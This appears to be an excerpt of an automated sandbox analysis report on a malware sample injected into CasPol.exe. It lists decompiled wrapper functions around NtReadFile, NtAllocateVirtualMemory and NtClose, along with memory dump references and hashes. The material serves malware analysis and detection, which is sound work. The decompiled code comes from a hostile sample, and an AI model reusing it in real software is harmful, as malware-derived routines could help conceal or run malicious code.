                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 28d66cf399481c95d32e110020bd23f1ef981db234855bc5189d8a5f907248b6
                                                                                                                                                                                                                                                                                                • Instruction ID: 0c08c0e38f336dbbf35a67dda85729340189d9c1c2ca355851ac7bf132b3d8ce
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28d66cf399481c95d32e110020bd23f1ef981db234855bc5189d8a5f907248b6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06F0CFB2200108ABCB14DF99DC85EEB7BA9EF8C354F158249FA0DA7241C630E911CBA0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0041E643 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 172 41e643-41e68c call 41f203 NtReadFile
                                                                                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                                			E0041E643(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t3 = _a4 + 0xa74; // 0xa76
				_t27 = _t3;
				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                                                                                                                                                                                                                                                                                0x0041e652
                                                                                                                                                                                                                                                                                                0x0041e652
                                                                                                                                                                                                                                                                                                0x0041e65a
                                                                                                                                                                                                                                                                                                0x0041e688
                                                                                                                                                                                                                                                                                                0x0041e68c

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtReadFile.NTDLL(004194D3,0041499B,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,0041499B,004194D3,00000002,00000000), ref: 0041E688
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                                                                                                                                                                                                • Instruction ID: aa4a829568f7423d39f4ec96ffd58af37ce6892a559b0f629fddbcd99df9d704
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BAF0FFB2200208ABCB04DF89DC84EEB77ADAF8C714F018248BE0DA7241C630E8118BA0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0041E76D Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 175 41e76d-41e7b0 call 41f203 NtAllocateVirtualMemory
                                                                                                                                                                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                                                                                                                                                                			E0041E76D(void* __edx, void* __fp0, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28, void* _a115) {
				intOrPtr _v117;
				long _t17;

				asm("out 0xd1, al");
				_v117 = _v117 + __edx;
				_t13 = _a4;
				_t5 = _t13 + 0x14; // 0x6ad04d03
				_t6 = _t13 + 0xa8c; // 0x404083
				E0041F203( *_t5, _a4, _t6,  *_t5, 0, 0x30);
				_t17 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t17;
			}





                                                                                                                                                                                                                                                                                                0x0041e76d
                                                                                                                                                                                                                                                                                                0x0041e772
                                                                                                                                                                                                                                                                                                0x0041e776
                                                                                                                                                                                                                                                                                                0x0041e779
                                                                                                                                                                                                                                                                                                0x0041e782
                                                                                                                                                                                                                                                                                                0x0041e78a
                                                                                                                                                                                                                                                                                                0x0041e7ac
                                                                                                                                                                                                                                                                                                0x0041e7b0

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,004035F7,00000004,00001000,00000000), ref: 0041E7AC
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                                                                                                                                                • Opcode ID: ee756809d0463d5cf1ffea27d1cfcbd02b1cf75dbeff1db517c4747886c75ae7
                                                                                                                                                                                                                                                                                                • Instruction ID: 864ad69e3011cdc826fcdf3463504ce9b0c8951d6cc57d2b8f66622e5bcdf5d0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee756809d0463d5cf1ffea27d1cfcbd02b1cf75dbeff1db517c4747886c75ae7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3F034B2600208ABCB14DF98CC41EEB37ADAF88354F118119FE0997252C630E815CBA4
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0041E773 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 178 41e773-41e789 179 41e78f-41e7b0 NtAllocateVirtualMemory 178->179 180 41e78a call 41f203 178->180 180->179
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0041E773(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t10 = _a4;
				_t2 = _t10 + 0x14; // 0x6ad04d03
				_t3 = _t10 + 0xa8c; // 0x404083
				E0041F203( *_t2, _a4, _t3,  *_t2, 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                                                                                                                                                                                                                                                                0x0041e776
                                                                                                                                                                                                                                                                                                0x0041e779
                                                                                                                                                                                                                                                                                                0x0041e782
                                                                                                                                                                                                                                                                                                0x0041e78a
                                                                                                                                                                                                                                                                                                0x0041e7ac
                                                                                                                                                                                                                                                                                                0x0041e7b0

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,004035F7,00000004,00001000,00000000), ref: 0041E7AC
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                                                                                                                                                                                                                • Instruction ID: 1b90bcd36e8a78153eba8f51a40a1fce6fab4eed9a3e5dfa1b1f9faf88a12c54
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13F01EB6200208ABCB18DF89DC81EEB77ADAF88754F018159FE0897241C630F811CBB4
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0041E6C3 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0041E6C3(intOrPtr _a4, void* _a8) {
				long _t8;

				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                                                                                                                                                                                                                                                                0x0041e6da
                                                                                                                                                                                                                                                                                                0x0041e6e8
                                                                                                                                                                                                                                                                                                0x0041e6ec

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtClose.NTDLL(00410348,00000000,?,00410348,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6E8
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                                                                                                                                                                                                                • Instruction ID: 9ee9210bb05c48301ec95111c73dbb9c9ea8a797f0d2d2d6377b377fa5d8e709
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5ED01776604218ABD610EBA9DC89FD77BACDF48664F0184A9BA1C5B242C671FA0086E1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0041E6BE Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0041E6BE(void* __edi, void* __esi, intOrPtr _a4, void* _a8) {
				long _t9;

				_t6 = _a4;
				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t6, _t6 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}




                                                                                                                                                                                                                                                                                                0x0041e6c6
                                                                                                                                                                                                                                                                                                0x0041e6da
                                                                                                                                                                                                                                                                                                0x0041e6e8
                                                                                                                                                                                                                                                                                                0x0041e6ec

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtClose.NTDLL(00410348,00000000,?,00410348,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6E8
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 6a413986c672f9c4500663bc36cf28119bdd7b8d41ccb101deb52b47a519a9fb
                                                                                                                                                                                                                                                                                                • Instruction ID: a83627c48fb09607d7489d41a2bc8f9ecd1366b18a2a80a5dfb2e3b4a2810487
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a413986c672f9c4500663bc36cf28119bdd7b8d41ccb101deb52b47a519a9fb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5E08C7A600204ABD610EBA4CC45ED73BA9DF88224F018459BE195B342C270FA008BE0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01769540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 0c44aa92e2726fc247f318362d6cf83594c057c9d956502240ffe331feea4798
                                                                                                                                                                                                                                                                                                • Instruction ID: cc3be875291a58386923c41f57e0ad25db2b7567e7110d86d32fcebe20094fbb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c44aa92e2726fc247f318362d6cf83594c057c9d956502240ffe331feea4798
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80900265215000071515A59947045074046ABD9391751C031F1006550CD66188617161
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01769910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 3b7ec3c7f00e4e1dc38ad3a6eca6a59e38a7acdafee68c74fee2a56500caa367
                                                                                                                                                                                                                                                                                                • Instruction ID: 41db17f53036bf236683fb5e74921d43bffaf95b46eb89b84d0cfc802d3615b8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b7ec3c7f00e4e1dc38ad3a6eca6a59e38a7acdafee68c74fee2a56500caa367
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC9002B120500406E550719984047464005ABD4341F51C021A5055554EC6998DD576A5
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01769710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 8ac9c2c243e089a8055a7eb8f0a4928f19467bf3517342ea154e764603ac85df
                                                                                                                                                                                                                                                                                                • Instruction ID: b6c5b6871a7e29c81c08ab637b0a02e3765e026fea86d67d36b56386f062e68e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ac9c2c243e089a8055a7eb8f0a4928f19467bf3517342ea154e764603ac85df
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0190027120500406E51065D994086464005ABE4341F51D021A5015555EC6A588917171
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01769FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 065a0d73646474b0942eca30cccd006219523a06f8acfe19acc71b60c022db2f
                                                                                                                                                                                                                                                                                                • Instruction ID: c3613e7bc6d308cb353a6f690ee8665c6b53d4496eac8c5b642b0cbc71c6c263
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 065a0d73646474b0942eca30cccd006219523a06f8acfe19acc71b60c022db2f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD90027131514406E5206199C4047064005ABD5241F51C421A0815558DC6D588917162
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017695D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 82dff45acca7a2f98759b64f8c17e0137c2bdc7a4d3dd81359f2500b17ed225b
                                                                                                                                                                                                                                                                                                • Instruction ID: 65a73f744fc07f38f2a09f5f0ba78e3179e34f0244e312607a63ccca7495a616
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82dff45acca7a2f98759b64f8c17e0137c2bdc7a4d3dd81359f2500b17ed225b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA9002A120600007551571998414616800AABE4241F51C031E1005590DC56588917165
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017699A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 1855d05c729eb2cc7cd88ea147b4c67b106649b669fc27bf3f8284f27a39c6e8
                                                                                                                                                                                                                                                                                                • Instruction ID: 85345dcabcb083d71d903031c75b2927d4285d5a32004c2501fe04e4a7ec05a3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1855d05c729eb2cc7cd88ea147b4c67b106649b669fc27bf3f8284f27a39c6e8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F9002A134500446E51061998414B064005EBE5341F51C025E1055554DC659CC527166
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017697A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: fc61d373af965fd5d45131fb000684396c314498ffaeeefb71c74028403ac035
                                                                                                                                                                                                                                                                                                • Instruction ID: f117de092d587c33459a25062b807e61e062b987ea55bb6f1c60c82f92208d27
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc61d373af965fd5d45131fb000684396c314498ffaeeefb71c74028403ac035
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E390026130500007E550719994186068005FBE5341F51D021E0405554CD95588567262
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01769780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: aa52d36a84d0273691903bdad3f28c3514deab8e4c0efdfa4256c263ea74d00a
                                                                                                                                                                                                                                                                                                • Instruction ID: aedf042fddeda9bde598596a1d668954a518aa5f0753c1b9028c37022a549ea9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa52d36a84d0273691903bdad3f28c3514deab8e4c0efdfa4256c263ea74d00a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8190026921700006E5907199940860A4005ABD5242F91D425A0006558CC95588697361
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01769860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c3b127a8c85e8b900b57cc8d7abd95e05a7f6798a06472237b145b2b90e8a79f
                                                                                                                                                                                                                                                                                                • Instruction ID: ab3862a7901da0baac5cd6f3e9f1704e57735ac083d3eadb3391a1bce6efd1be
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3b127a8c85e8b900b57cc8d7abd95e05a7f6798a06472237b145b2b90e8a79f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E90027120500417E521619985047074009ABD4281F91C422A0415558DD6968952B161
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01769660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: a21cc7bfb2c27821711e6c55f438f466a47d7570d0412c71731a6f674c912145
                                                                                                                                                                                                                                                                                                • Instruction ID: 63844c1fa4f5d668bed9a1088b74e07b98bb22c5542fb05c463bf62b3bf40671
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a21cc7bfb2c27821711e6c55f438f466a47d7570d0412c71731a6f674c912145
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E690027120500806E5907199840464A4005ABD5341F91C025A0016654DCA558A5977E1
                                                                                                                                                                                                                                                                                                Uniqueness

